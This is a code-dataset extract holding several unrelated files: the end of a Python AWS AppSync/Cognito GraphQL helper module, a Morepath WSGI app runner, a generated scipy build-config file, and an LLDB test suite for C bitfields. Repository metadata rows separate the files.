time.sleep(retry_map['backoff_time'])
retry_map['prev_ts'] = datetime.now()
logger.log(Logger.INFO, "CF: Re-Subscribing EP: %s" % (ep))
setup_env_and_subscribe(sub_list=kwargs['sub_list'],
appsync_sub_mgrs_map=kwargs['appsync_sub_mgrs_map'], logger=kwargs['logger'],
on_connection_error=kwargs['on_connection_error'],
on_error=kwargs['on_error'], on_sub_error=kwargs['on_sub_error'],
on_close=kwargs['on_close'], current_env=kwargs['current_env'],
on_subscription_success=kwargs['on_subscription_success'],
use_local_instance=kwargs['use_local_instance'])
'''
Since we store the args that are passed to check & subscribe, we
want to make sure that all the arguments are KW args so that they
can be stored & later passed back to this function on a socket
close for reconnection.
ALL THE ARGS SHOULD BE KWARGS.
'''
def check_and_subscribe(endpoint=None, endpoint_user_dict=None, username=None,
id_token=None, sub_list=None, appsync_sub_mgrs_map=None, logger=None,
on_connection_error=None, on_error=None, on_sub_error=None, on_close=None,
current_env=None, on_subscription_success=None, use_local_instance=False):
# MUST BE THE VERY FIRST LINE IN THIS FUNCTION!
cur_args = locals()
if endpoint in appsync_sub_mgrs_map:
logger.log(Logger.DEBUG, "Sub Mgr already exists for endpoint: %s user: %s" % (endpoint, username))
return False
tmp_cb_data = {
'current_env': current_env,
'endpoint': endpoint,
'username': username,
'id_token': id_token,
'endpoint_user_dict': endpoint_user_dict,
'kwargs': cur_args,
'use_local_instance': use_local_instance,
'gql_psk': GQL_PSK
}
my_mgr = asm.AppSyncSubscriptionManager(id_token = id_token,
appsync_api_id = endpoint.split('/')[2].split('.')[0],
on_connection_error = on_connection_error,
on_error = on_error,
on_close = cf_on_close,
use_local_instance = use_local_instance,
cb_data = tmp_cb_data)
sub_dict = {}
for tmp_set in sub_list:
sub_query = tmp_set[0]
on_message = tmp_set[1]
if len(tmp_set) == 3:
sub_filter = tmp_set[2]
else:
sub_filter = {}
my_sub = my_mgr.subscribe(sub_query, on_message, on_sub_error,
on_subscription_success, sub_filter=sub_filter)
sub_dict[my_sub.get_id()] = my_sub
tmp_cb_data['subscriptions'] = sub_dict
tmp_cb_data['manager'] = my_mgr
appsync_sub_mgrs_map[endpoint] = tmp_cb_data
x = threading.Thread(target=my_mgr.run_forever, args=())
x.start()
return True
def gql_main_loop(current_env, logger, users, blacklisted_tokens,
user_list, user_dict, username_dict, sleep_time, sub_list,
appsync_sub_mgrs_map, on_error,
on_sub_error, on_connection_error, on_close,
on_subscription_success, use_local_instance=False):
global ENVIRONMENTS
init_done = False
env_list = []
set_env_var(current_env, 'USERS', users)
try:
while True:
if (use_local_instance or current_env) and not init_done:
if use_local_instance or (current_env in ENVIRONMENTS):
setup_env_and_subscribe(sub_list=sub_list, appsync_sub_mgrs_map=appsync_sub_mgrs_map, logger=logger,
on_connection_error=on_connection_error, on_error=on_error, on_sub_error=on_sub_error,
on_close=on_close, current_env=current_env, on_subscription_success=on_subscription_success,
use_local_instance=use_local_instance)
else:
logger.log(Logger.ERROR, "Could not find CURRENT_ENV: %s" % (current_env))
init_done = True
elif not current_env and not init_done:
# Remove PROD to be processed in dev
if 'PROD' in env_list:
logger.log(Logger.INFO, "Removing PROD from env list...")
env_list.remove('PROD')
for env in env_list:
if env in ENVIRONMENTS:
setup_env_and_subscribe(sub_list=sub_list, appsync_sub_mgrs_map=appsync_sub_mgrs_map, logger=logger,
on_connection_error=on_connection_error, on_error=on_error, on_sub_error=on_sub_error,
on_close=on_close, current_env=env, on_subscription_success=on_subscription_success)
else:
logger.log(Logger.ERROR, "Could not find ENV: %s" % (env))
init_done = True
# logger.log(Logger.DEBUG, "Sleeping for %d secs..." % sleep_time)
time.sleep(sleep_time)
except KeyboardInterrupt as e:
os.kill(os.getpid(), signal.SIGTERM)
def get_env_var(env, var):
return ENVIRONMENTS[env][var]
def set_env_var(env, var, val):
ENVIRONMENTS[env][var] = val
def init_environment(env, users, user_list, user_dict, username_dict, logger):
# First clean the user_list (in case its a re-init)
del user_list[:]
# Authenticate all the users...
for user in users:
user_list.append(user['username'])
# create a cognito user object
u = warrant.Cognito(get_env_var(env, 'COGNITO_USER_POOL_ID'),
get_env_var(env, 'COGNITO_USER_POOL_CLIENT_ID'),
username=user['username'])
try:
# Try to authenticate the user
u.authenticate(password=user['passwd'])
except Exception as e:
# Authentication failed...
logger.log(Logger.ERROR, "%r" % (e))
sys.exit(2)
# Save the authenticated cognito user object
user['auth'] = u
# get the user ID by decoding the id_token
decoded = u.verify_token(u.id_token, 'id_token', 'id')
user['id'] = decoded['sub']
user['decoded_id_token'] = decoded
# Save the warrant cognito user object in the USER ID MAP
user_dict[decoded['sub']] = u
username_dict[user['username']] = u
set_env_var(env, 'USERNAME_DICT', username_dict)
set_env_var(env, 'USER_DICT', user_dict)
def check_user_token(current_env, endpoint, username, username_dict):
env_endpoint = get_env_var(current_env, "GRAPHQL_API_ENDPOINT")
if env_endpoint == endpoint:
a = username_dict.get(username, None)
if a:
return a.id_token
return None
'''
This function takes a function pointer and executes it.
If the execution results in a 'token expired' error, it
will try to re-authenticate the 'username' with its
password from the current_env & if successful, will use
that new token and retry the function call.
ARGUMENTS:
func: Function that should be called and retried
args: Arguments for 'func' or () if no arguments
kwargs: Keyword arguments for 'func' or {} if no keyword arguments
current_env: Current environment string
username: Username that should be used for retrying if 'func'
fails due to 'token expired' error
id_token_index: Index of the ID token in 'args' or -1
endpoint_index: Index of the endpoint URL in 'args' above or -1
The next 3 arguments should be passed from
when the environment was originally initialized
user_list: list of users in this environment
user_dict: dictionary of users keyed of user id
username_dict: dictionary of users keyed of username
logger: Instance of 'Logger' class to be used for logs
'''
def execute_function_with_retry(func, args, kwargs, current_env,
username, id_token_index, endpoint_index,
user_list, user_dict, username_dict, logger,
use_local_instance=False):
retried_already = False
if use_local_instance:
kwargs.update({'use_local_instance': use_local_instance})
current_env = None
while True:
try:
# Try to get an updated token before calling the function
# But not if this is a local instance
if (not use_local_instance) and current_env and endpoint_index >= 0:
new_token = check_user_token(current_env, args[endpoint_index], username, username_dict)
if new_token:
args = args[:id_token_index] + (new_token,) + args[(id_token_index + 1):]
return func(*args, **kwargs)
except Exception as e:
err_str = str(e)
if use_local_instance:
logger.log(Logger.ERROR, "Using local instance, cannot retry")
raise
if not current_env:
logger.log(Logger.ERROR, "No ENV set, cannot retry")
raise
# Trying to handle more cases of unauthorized access. Most of the times
# we get reason as "token is expired" but sometimes we also get "unauthorized".
if "code: 401 reason: unauthorized" in err_str.lower():
if not retried_already:
retried_already = True
logger.log(Logger.ERROR, "%s failed, %s, retrying" % (func.__name__, str(e)))
try:
init_environment(current_env, get_env_var(current_env, 'USERS'),
user_list, user_dict, username_dict, logger)
except Exception as e:
logger.log(Logger.ERROR, "Retry failed: env initialization failed")
raise
# rebuild args with new id_token
if username in username_dict:
logger.log(Logger.DEBUG, "Updated token for user: " + username)
args = args[:id_token_index] + (username_dict[username].id_token,) + args[(id_token_index + 1):]
else:
logger.log(Logger.ERROR, "Could not find USER: %s" % (username))
raise
else:
logger.log(Logger.ERROR, "Already tried once, giving up")
raise
else:
logger.log(Logger.ERROR, "Unhandled error, cannot retry")
raise
def plural(m):
if (m[-1] == 's' or m[-1] == 'h'):
return (m+"es")
else:
return (m+"s")
def make_lower(val):
return val[0].lower() + val[1:]
def capitalize(val):
if not isinstance(val, six.string_types):
return ''
s = val[0].upper()
t = ""
i = 1
while i < len(val):
if re.match(r'[A-Z]', val[i]):
t += val[i]
elif (len(t) > 0):
s = s + t[0:-1].lower() + t[len(t) - 1] + val[i:]
return s
else:
s = s + val[i:]
return s
def load_content(content):
return json.loads(content if six.PY2 else content.decode('utf-8'))
def add_model_mapping(model_name, obj):
mmap = Localops.MODEL_MAPPING.get(model_name, None)
if mmap:
for (k, v) in iteritems(mmap):
obj[k] = {"connect": {"id": obj[v]}}
return obj
def add_model_relation(model_name, obj):
mr = Localops.MODEL_RELATION.get(model_name, None)
if mr:
for field in mr:
obj[field] = {"set":obj[field]}
return obj
def convert_filter(aws_filter):
if not aws_filter:
return aws_filter
local_filter = {}
for (key, value) in iteritems(aws_filter):
if isinstance(value, six.string_types):
local_filter[key] = value
continue
for (k, v) in iteritems(value):
if k == 'eq':
new_key = key
elif k == 'ne':
new_key = key + '_not'
elif k == 'lt':
new_key = key + '_lt'
elif k == 'lte':
new_key = key + '_lte'
elif k == 'gt':
new_key = key + '_gt'
elif k == 'gte':
new_key = key + '_gte'
elif k == 'contains':
new_key = key + '_contains'
elif k == 'notContains':
new_key = key + '_not_contains'
elif k == 'between':
new_key = key +'_not_starts_with'
elif k == 'beginsWith':
new_key = key +'_starts_with'
else:
new_key = key
local_filter[new_key] = v
return local_filter
# Get the Auth header for passing to a requests library call (GET, POST, etc.)
def get_auth_header(id_token, use_local_instance=False):
if not use_local_instance:
return {"Authorization": id_token}
elif GQL_PSK:
return {"X-Api-Key": GQL_PSK}
else:
raise ValueError("No Pre Shared Key set for local instance authentication")
# Remove an object of a given model
def remove_obj(endpoint, id_token, model_name, obj,
custom_query=None, mutations_module=None,
use_local_instance=False):
# Get the header
auth_header = get_auth_header(id_token, use_local_instance=use_local_instance)
if use_local_instance:
mutations_module = Localops
elif not mutations_module:
mutations_module = Mutations
# Set the input for delete object query
vars = {"input": {"id": obj['id']}}
updated_model_name = model_name[0].upper() + model_name[1:]
connector_name = "delete" + updated_model_name
if use_local_instance:
connector = mutations_module.LOCALOPS[connector_name.lower()]
elif custom_query:
connector = custom_query
else:
connector = mutations_module.MUTATIONS[connector_name.lower()]
# Send the POST request. All queries & mutations are sent
# as a post request in aws-amplify/graphql, in JSON format.
try:
r = requests.post(endpoint, headers=auth_header,
json={"query": connector, "variables": vars})
res = load_content(r.content)
except Exception as e:
s = "Delete object request failed: " + str(e)
raise DeleteObjectError(s)
if r.status_code == 200:
# Even if the return code was 200, we could still have errors.
if 'errors' in res:
s = "Failed to delete object: " + updated_model_name \
+ " ERROR: " + res['errors'][0]['message']
raise DeleteObjectError(s)
else:
s = "ERROR: Failed to delete object: %s CODE: %d REASON: %s MSG: %s" % (updated_model_name, r.status_code, r.reason, res['errors'][0]['message'])
raise DeleteObjectError(s)
# Insert an object of a given model
def insert_obj(endpoint, id_token, model_name, obj,
custom_query=None, mutations_module=None,
use_local_instance=False):
# Get the header
auth_header = get_auth_header(id_token, use_local_instance=use_local_instance)
if use_local_instance:
mutations_module = Localops
elif not mutations_module:
mutations_module = Mutations
# Set the input for insert object query
if use_local_instance:
deleteList=['UsersCanView', 'UsersCanAccess', "GroupsCanView", 'GroupsCanAccess']
for elem in deleteList:
if elem in obj:
del obj[elem]
obj = add_model_mapping(model_name, obj)
obj = add_model_relation(model_name, obj)
vars = {"input": obj}
updated_model_name = model_name[0].upper() + model_name[1:]
connector_name = "create" + updated_model_name
if use_local_instance:
connector = mutations_module.LOCALOPS[connector_name.lower()]
elif custom_query:
connector = custom_query
else:
connector = mutations_module.MUTATIONS[connector_name.lower()]
# Send the POST request. All queries & mutations are sent
# as a post request in aws-amplify/graphql, in JSON format.
try:
r = requests.post(endpoint, headers=auth_header,
json={"query": connector, "variables": vars})
res = load_content(r.content)
except Exception as e:
s = "Insert object request failed: " + str(e)
raise InsertObjectError(s)
if r.status_code == 200:
# Even if the return code was 200, we could still have errors.
if 'errors' in res:
s = "Failed to insert object: " + updated_model_name \
+ " ERROR: " + res['errors'][0]['message']
raise InsertObjectError(s)
else:
return res['data'][connector_name]
else:
s = "ERROR: Failed to insert object: %s CODE: %d REASON: %s MSG: %s" % (updated_model_name, r.status_code, r.reason, res['errors'][0]['message'])
raise InsertObjectError(s)
# Update an object of a given model
def update_obj(endpoint, id_token, model_name, obj,
custom_query=None, mutations_module=None,
use_local_instance=False):
vars = {}
# Get the header
auth_header = get_auth_header(id_token, use_local_instance=use_local_instance)
updated_model_name = model_name[0].upper() + model_name[1:]
connector_name = "update" + updated_model_name
if use_local_instance:
mutations_module = Localops
elif not mutations_module:
mutations_module = Mutations
if use_local_instance:
connector = mutations_module.LOCALOPS[connector_name.lower()]
elif custom_query:
connector = custom_query
else:
connector = mutations_module.MUTATIONS[connector_name.lower()]
# Set the input for update object query
if use_local_instance:
obj = copy.deepcopy(obj)
model_id = obj['id']
deleteList=['UsersCanView', 'UsersCanAccess', "GroupsCanView", 'GroupsCanAccess', 'id']
for elem in deleteList:
if elem in obj:
del obj[elem]
# obj = add_model_mapping(model_name, obj)
obj = add_model_relation(model_name, obj)
vars['where'] = {'id': model_id}
vars["input"] = obj
# Send the POST request. All queries & mutations are sent
# as a post request in aws-amplify/graphql, in JSON format.
try:
r = requests.post(endpoint, headers=auth_header,
json={"query": connector, "variables": vars})
res = load_content(r.content)
except Exception as e:
s = "Update object request failed: " + str(e)
raise UpdateObjectError(s)
if r.status_code == 200:
# Even if the return code was 200, we could still have errors.
if 'errors' in res:
s = "Failed to update object: " + updated_model_name \
+ " ERROR: " + res['errors'][0]['message']
raise UpdateObjectError(s)
else:
return res['data'][connector_name]
else:
s = "ERROR: Failed to update object: %s CODE: %d REASON: %s MSG: %s" % (updated_model_name, r.status_code, r.reason, res['errors'][0]['message'])
raise UpdateObjectError(s)
def update_obj_custom(endpoint, id_token, model_name, obj,
connector, connector_name, use_local_instance=False):
# Get the header
auth_header = get_auth_header(id_token, use_local_instance=use_local_instance)
# Set the input for update object query
vars = {"input": obj}
updated_model_name = model_name[0].upper() + model_name[1:]
# Send the POST request. All queries & mutations are sent
# as a post request in aws-amplify/graphql, in JSON format.
try:
r = requests.post(endpoint, headers=auth_header,
json={"query": connector, "variables": vars})
res = json.loads(r.content)
except Exception as e:
s = "Update object request failed: " + str(e)
raise UpdateObjectError(s)
if r.status_code == 200:
# Even if the return code was 200, we could still have errors.
if 'errors' in res:
s = "Failed to update object: " + updated_model_name \
+ " ERROR: " + res['errors'][0]['message']
raise UpdateObjectError(s)
else:
return res['data'][connector_name]
else:
s = "ERROR: Failed to update object: %s CODE: %d REASON: %s MSG: %s" % (updated_model_name, r.status_code, r.reason, res['errors'][0]['message'])
raise UpdateObjectError(s)
# Get a specific object of a given model with specified field as key
def get_obj(endpoint, id_token, model_name, vars,
secondaryKeyFunction=False, custom_query=None,
queries_module=None, use_local_instance=False):
# Get the header
auth_header = get_auth_header(id_token, use_local_instance=use_local_instance)
if not queries_module:
queries_module = Queries
if use_local_instance:
updated_model_name = model_name[0].upper() + model_name[1:]
connector_name = "get" + updated_model_name
elif secondaryKeyFunction:
connector_name = model_name
updated_model_name = model_name
else:
updated_model_name = model_name[0].upper() + model_name[1:]
connector_name = "get" + updated_model_name
filter_vars = vars
if use_local_instance:
connector = Localops.LOCALOPS[connector_name.lower()]
filter_vars = {}
filter_vars = {'filter': vars}
elif custom_query:
connector = custom_query
else:
connector = queries_module.QUERIES[connector_name.lower()]
# Send the POST request. All queries & mutations are sent
# as a post request in aws-amplify/graphql, in JSON format.
try:
r = requests.post(endpoint, headers=auth_header,
json={"query": connector, "variables": filter_vars})
res = load_content(r.content)
except Exception as e:
s = "Get obj request failed: " + str(e)
raise GetObjError(s)
if r.status_code == 200:
# Even if the return code was 200, we could still have errors.
if not 'errors' in res:
if use_local_instance:
connector_name = make_lower(model_name)
if res['data'][connector_name]:
return res['data'][connector_name]
else:
s = "Could not find object: %s" % (connector_name)
raise GetObjError(s)
if not secondaryKeyFunction:
return res['data'][connector_name]
if len(res['data'][connector_name]['items']) == 1:
return res['data'][connector_name]['items'][0]
else:
s = "Could not find object: secondaryKeyFunction: %s" % (connector_name)
raise GetObjError(s)
else:
s = "Failed to get objects: " + updated_model_name \
+ " ERROR: " + res['errors'][0]['message']
raise GetObjError(s)
else:
s = "ERROR: Failed to get objects: %s CODE: %d REASON: %s MSG: %s" % (updated_model_name, r.status_code, r.reason, res['errors'][0]['message'])
raise GetObjError(s)
# Get all the objects of a given model from a given starting point
def get_objs(endpoint, starting_from, id_token, model_name, filter,
secondaryKeyFunction=False, custom_query=None,
queries_module=None, use_local_instance=False,
custom_query_filter=None):
# Get the header
auth_header = get_auth_header(id_token,
use_local_instance=use_local_instance)
if not queries_module:
queries_module = Queries
# Set the input for list objects query
limit_count = 100
vars = {}
if use_local_instance:
if filter:
vars['filter'] = convert_filter(filter)
vars['skip'] = starting_from
vars['take'] = limit_count
else:
vars = {"limit": limit_count, "nextToken": starting_from}
if (filter):
vars['filter'] = filter
if custom_query_filter:
vars.update(custom_query_filter)
if secondaryKeyFunction:
connector_name = model_name
updated_model_name = model_name
else:
updated_model_name = model_name[0].upper() + model_name[1:]
connector_name = "list" + updated_model_name + "s"
if use_local_instance:
updated_model_name = capitalize(model_name)
connector_name = 'list' + plural(updated_model_name)
connector = Localops.LOCALOPS[connector_name.lower()]
connector_name = plural(make_lower(model_name))
elif custom_query:
connector = custom_query
else:
connector = queries_module.QUERIES[connector_name.lower()]
# Send the POST request. All queries & mutations are sent
# as a post request in aws-amplify/graphql, in JSON format.
try:
r = requests.post(endpoint, headers=auth_header,
json={"query": connector, "variables": vars})
res = load_content(r.content)
except Exception as e:
s = "List objects request failed: " + str(e)
raise ListObjectsError(s)
if r.status_code == 200:
# Even if the return code was 200, we could still have errors.
if not 'errors' in res:
#print "Got Connectors"
#print res['data']['listConnectorss']['items']
if use_local_instance:
if len(res['data'][connector_name]) == limit_count:
nextToken = starting_from + limit_count
else:
nextToken = 0
return (res['data'][connector_name], nextToken)
else:
return (res['data'][connector_name]['items'],
res['data'][connector_name]['nextToken'])
else:
s = "Failed to get objects: " + updated_model_name \
+ " ERROR: " + res['errors'][0]['message']
raise ListObjectsError(s)
else:
s = "ERROR: Failed to get objects: %s CODE: %d REASON: %s MSG: %s" % (updated_model_name, r.status_code, r.reason, res['errors'][0]['message'])
raise ListObjectsError(s)
def get_model_objects(endpoint, id_token, model_name, filter,
secondaryKeyFunction=False, custom_query=None,
queries_module=None, use_local_instance=False):
next_token = None
obj_list = []
while True:
try:
tmp_obj_list, next_token = get_objs(endpoint, next_token,
id_token, model_name, filter,
secondaryKeyFunction=secondaryKeyFunction,
custom_query=custom_query,
queries_module=queries_module,
use_local_instance=use_local_instance)
obj_list = obj_list + tmp_obj_list
if not next_token:
return obj_list
except ListObjectsError as e:
print("ERROR: %s" % (str(e)))
raise
return obj_list
def remove_model_objects(endpoint, id_token, model_name, obj_list,
custom_query=None, mutations_module=None):
for tmp_obj in obj_list:
try:
remove_obj(endpoint, id_token, model_name, tmp_obj,
custom_query=custom_query, mutations_module=mutations_module)
except:
pprint.pprint(tmp_obj)
traceback.print_exc()
raise
def insert_model_objects(endpoint, id_token, model_name, obj_list,
custom_query=None, mutations_module=None):
for tmp_obj in obj_list:
insert_obj(endpoint, id_token, model_name, tmp_obj,
custom_query=custom_query, mutations_module=mutations_module)
def update_model_objects(endpoint, id_token, model_name,
obj_list, custom_query=None, mutations_module=None):
for tmp_obj in obj_list:
update_obj(endpoint, id_token, model_name, tmp_obj,
custom_query=custom_query, mutations_module=mutations_module)
# Gzip a provided string
def gzip_string(input_str):
"""
out = StringIO.StringIO()
f = gzip.GzipFile(fileobj=out, mode="w")
f.write(input_str)
return out.getvalue()
"""
if six.PY3 and type(input_str) == str:
input_str = input_str.encode()
return codecs.encode(input_str, 'zlib')
#Gunzip a provided string
def gunzip_bytes(input_bytes):
return codecs.decode(input_bytes, 'zlib')
def b64encode(input_bytes):
return base64.b64encode(input_bytes)
def b64decode(input_str):
return base64.b64decode(input_str)
| 37.420613
| 153
| 0.64039
|
4a144c98eebd76e4b473bc6c90c5445dbddd0fdd
| 928
|
py
|
Python
|
conduit/run.py
|
yacoma/morepath-realworld-example-app
|
65f24dba26e133f7a920832f681fc12ba6a0a522
|
[
"MIT"
] | 5
|
2018-06-08T07:35:22.000Z
|
2020-01-04T20:55:16.000Z
|
conduit/run.py
|
yacoma/morepath-realworld-example-app
|
65f24dba26e133f7a920832f681fc12ba6a0a522
|
[
"MIT"
] | 2
|
2018-06-08T07:35:02.000Z
|
2018-06-11T21:12:30.000Z
|
conduit/run.py
|
yacoma/morepath-realworld-example-app
|
65f24dba26e133f7a920832f681fc12ba6a0a522
|
[
"MIT"
] | null | null | null |
import os
from webob.dec import wsgify
from webob.exc import HTTPNotFound
import morepath
from conduit import App, ProductionApp, TestApp
from conduit.database import db
def setup_db(app):
db_params = app.settings.database.__dict__.copy()
db.bind(**db_params)
db.generate_mapping(create_tables=True)
def wsgi_factory(): # pragma: no cover
morepath.autoscan()
if os.getenv("RUN_ENV") == "production":
ProductionApp.commit()
app = ProductionApp()
elif os.getenv("RUN_ENV") == "test":
TestApp.commit()
app = TestApp()
else:
App.commit()
app = App()
setup_db(app)
@wsgify
def run_morepath(request):
popped = request.path_info_pop()
if popped == "api":
return request.get_response(app)
else:
raise HTTPNotFound
return run_morepath
application = wsgi_factory() # pragma: no cover
| 21.090909
| 53
| 0.643319
|
4a144d4241a62ca7e822589fbe02db5bdc780eab
| 962
|
py
|
Python
|
Skimage_numpy/source/scipy/__config__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | 1
|
2019-06-27T12:09:44.000Z
|
2019-06-27T12:09:44.000Z
|
Skimage_numpy/source/scipy/__config__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | null | null | null |
Skimage_numpy/source/scipy/__config__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | null | null | null |
# This file is generated by /tmp/pip-gyg03j-build/-c
# It contains system_info results at the time of building this package.
__all__ = ["get_info","show"]
lapack_opt_info={'libraries': ['openblas'], 'library_dirs': ['/usr/local/lib'], 'language': 'f77'}
openblas_info={'libraries': ['openblas'], 'library_dirs': ['/usr/local/lib'], 'language': 'f77'}
blas_opt_info={'libraries': ['openblas'], 'library_dirs': ['/usr/local/lib'], 'language': 'f77'}
def get_info(name):
g = globals()
return g.get(name, g.get(name + "_info", {}))
def show():
for name,info_dict in globals().items():
if name[0] == "_" or type(info_dict) is not type({}): continue
print(name + ":")
if not info_dict:
print(" NOT AVAILABLE")
for k,v in info_dict.items():
v = str(v)
if k == "sources" and len(v) > 200:
v = v[:60] + " ...\n... " + v[-60:]
print(" %s = %s" % (k,v))
| 40.083333
| 98
| 0.561331
|
4a144d5e80c65ab496e29306bfd0dbc2a6ca6bb3
| 8,411
|
py
|
Python
|
lldb/test/API/lang/c/bitfields/TestBitfields.py
|
mkinsner/llvm
|
589d48844edb12cd357b3024248b93d64b6760bf
|
[
"Apache-2.0"
] | 605
|
2019-10-18T01:15:54.000Z
|
2022-03-31T14:31:04.000Z
|
lldb/test/API/lang/c/bitfields/TestBitfields.py
|
mkinsner/llvm
|
589d48844edb12cd357b3024248b93d64b6760bf
|
[
"Apache-2.0"
] | 3,180
|
2019-10-18T01:21:21.000Z
|
2022-03-31T23:25:41.000Z
|
lldb/test/API/lang/c/bitfields/TestBitfields.py
|
mkinsner/llvm
|
589d48844edb12cd357b3024248b93d64b6760bf
|
[
"Apache-2.0"
] | 275
|
2019-10-18T05:27:22.000Z
|
2022-03-30T09:04:21.000Z
|
"""Test C bitfields."""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def run_to_main(self):
self.build()
lldbutil.run_to_source_breakpoint(self, "// break here", lldb.SBFileSpec("main.c"))
# BitFields exhibit crashes in record layout on Windows
# (http://llvm.org/pr21800)
@skipIfWindows
def test_bits(self):
self.run_to_main()
# Check each field of Bits.
bits_children = [
ValueCheck(type="int:1"), # Unnamed and uninitialized
ValueCheck(type="uint32_t:1", name="b1", value="1"),
ValueCheck(type="uint32_t:2", name="b2", value="3"),
ValueCheck(type="int:2"), # Unnamed and uninitialized
ValueCheck(type="uint32_t:3", name="b3", value="7"),
ValueCheck(type="uint32_t", name="b4", value="15"),
ValueCheck(type="uint32_t:5", name="b5", value="31"),
ValueCheck(type="uint32_t:6", name="b6", value="63"),
ValueCheck(type="uint32_t:7", name="b7", value="127"),
ValueCheck(type="uint32_t:4", name="four", value="15")
]
self.expect_var_path("bits", type="Bits", children=bits_children)
self.expect_expr("bits", result_children=bits_children)
# Try accessing the different fields using the expression evaluator.
self.expect_expr("bits.b1", result_type="uint32_t", result_value="1")
self.expect_expr("bits.b2", result_type="uint32_t", result_value="3")
self.expect_expr("bits.b3", result_type="uint32_t", result_value="7")
self.expect_expr("bits.b4", result_type="uint32_t", result_value="15")
self.expect_expr("bits.b5", result_type="uint32_t", result_value="31")
self.expect_expr("bits.b6", result_type="uint32_t", result_value="63")
self.expect_expr("bits.b7", result_type="uint32_t", result_value="127")
self.expect_expr("bits.four", result_type="uint32_t", result_value="15")
# Try accessing the different fields using variable paths.
self.expect_var_path("bits.b1", type="uint32_t:1", value="1")
self.expect_var_path("bits.b2", type="uint32_t:2", value="3")
self.expect_var_path("bits.b4", type="uint32_t", value="15")
self.expect_var_path("bits.b5", type="uint32_t:5", value="31")
self.expect_var_path("bits.b7", type="uint32_t:7", value="127")
# Check each field of MoreBits.
more_bits_children = [
ValueCheck(type="uint32_t:3", name="a", value="3"),
ValueCheck(type="int:1", value="0"),
ValueCheck(type="uint8_t:1", name="b", value="'\\0'"),
ValueCheck(type="uint8_t:1", name="c", value="'\\x01'"),
ValueCheck(type="uint8_t:1", name="d", value="'\\0'"),
]
self.expect_var_path("more_bits", type="MoreBits", children=more_bits_children)
self.expect_expr("more_bits", result_children=more_bits_children)
self.expect_expr("more_bits.a", result_type="uint32_t", result_value="3")
self.expect_expr("more_bits.b", result_type="uint8_t", result_value="'\\0'")
self.expect_expr("more_bits.c", result_type="uint8_t", result_value="'\\x01'")
self.expect_expr("more_bits.d", result_type="uint8_t", result_value="'\\0'")
# Test a struct with several single bit fields.
many_single_bits_children = [
ValueCheck(type="uint16_t:1", name="b1", value="1"),
ValueCheck(type="uint16_t:1", name="b2", value="0"),
ValueCheck(type="uint16_t:1", name="b3", value="0"),
ValueCheck(type="uint16_t:1", name="b4", value="0"),
ValueCheck(type="uint16_t:1", name="b5", value="1"),
ValueCheck(type="uint16_t:1", name="b6", value="0"),
ValueCheck(type="uint16_t:1", name="b7", value="1"),
ValueCheck(type="uint16_t:1", name="b8", value="0"),
ValueCheck(type="uint16_t:1", name="b9", value="0"),
ValueCheck(type="uint16_t:1", name="b10", value="0"),
ValueCheck(type="uint16_t:1", name="b11", value="0"),
ValueCheck(type="uint16_t:1", name="b12", value="0"),
ValueCheck(type="uint16_t:1", name="b13", value="1"),
ValueCheck(type="uint16_t:1", name="b14", value="0"),
ValueCheck(type="uint16_t:1", name="b15", value="0"),
ValueCheck(type="uint16_t:1", name="b16", value="0"),
ValueCheck(type="uint16_t:1", name="b17", value="0"),
]
self.expect_var_path("many_single_bits", type="ManySingleBits", children=many_single_bits_children)
self.expect_expr("many_single_bits", result_type="ManySingleBits",
result_children=many_single_bits_children)
# Check a packed struct.
self.expect_expr("packed.a", result_type="char", result_value="'a'")
self.expect_expr("packed.b", result_type="uint32_t", result_value="10")
self.expect_expr("packed.c", result_type="uint32_t", result_value=str(int("7112233", 16)))
# A packed struct with bitfield size > 32.
self.expect("v/x large_packed", VARIABLES_DISPLAYED_CORRECTLY,
substrs=["a = 0x0000000cbbbbaaaa", "b = 0x0000000dffffeee"])
# Check reading a bitfield through a pointer in various ways (PR47743)
self.expect("v/x large_packed_ptr->b",
substrs=["large_packed_ptr->b = 0x0000000dffffeeee"])
self.expect("v/x large_packed_ptr[0].b",
substrs=["large_packed_ptr[0].b = 0x0000000dffffeeee"])
# BitFields exhibit crashes in record layout on Windows
# (http://llvm.org/pr21800)
@skipIfWindows
def test_expression_bug(self):
# Ensure evaluating (emulating) an expression does not break bitfield
# values for already parsed variables. The expression is run twice
# because the very first expression can resume a target (to allocate
# memory, etc.) even if it is not being jitted.
self.run_to_main()
self.expect("v/x large_packed", VARIABLES_DISPLAYED_CORRECTLY,
substrs=["a = 0x0000000cbbbbaaaa", "b = 0x0000000dffffeee"])
self.expect("expr --allow-jit false -- more_bits.a", VARIABLES_DISPLAYED_CORRECTLY,
substrs=['uint32_t', '3'])
self.expect("v/x large_packed", VARIABLES_DISPLAYED_CORRECTLY,
substrs=["a = 0x0000000cbbbbaaaa", "b = 0x0000000dffffeee"])
self.expect("expr --allow-jit false -- more_bits.a", VARIABLES_DISPLAYED_CORRECTLY,
substrs=['uint32_t', '3'])
self.expect("v/x large_packed", VARIABLES_DISPLAYED_CORRECTLY,
substrs=["a = 0x0000000cbbbbaaaa", "b = 0x0000000dffffeee"])
@add_test_categories(['pyapi'])
# BitFields exhibit crashes in record layout on Windows
# (http://llvm.org/pr21800)
@skipIfWindows
def test_and_python_api(self):
"""Use Python APIs to inspect a bitfields variable."""
self.run_to_main()
# Lookup the "bits" variable which contains 8 bitfields.
bits = self.frame().FindVariable("bits")
self.DebugSBValue(bits)
self.assertEqual(bits.GetTypeName(), 'Bits')
self.assertEqual(bits.GetNumChildren(), 10)
self.assertEqual(bits.GetByteSize(), 32)
# Notice the pattern of int(b1.GetValue(), 0). We pass a base of 0
# so that the proper radix is determined based on the contents of the
# string.
b1 = bits.GetChildMemberWithName("b1")
self.DebugSBValue(b1)
self.assertEqual(b1.GetName(), "b1")
self.assertEqual(b1.GetTypeName(), "uint32_t:1")
self.assertTrue(b1.IsInScope())
self.assertEqual(int(b1.GetValue(), 0), 1)
b7 = bits.GetChildMemberWithName("b7")
self.assertEqual(b7.GetName(), "b7")
self.assertEqual(b7.GetTypeName(), "uint32_t:7")
self.assertTrue(b7.IsInScope())
self.assertEqual(int(b7.GetValue(), 0), 127)
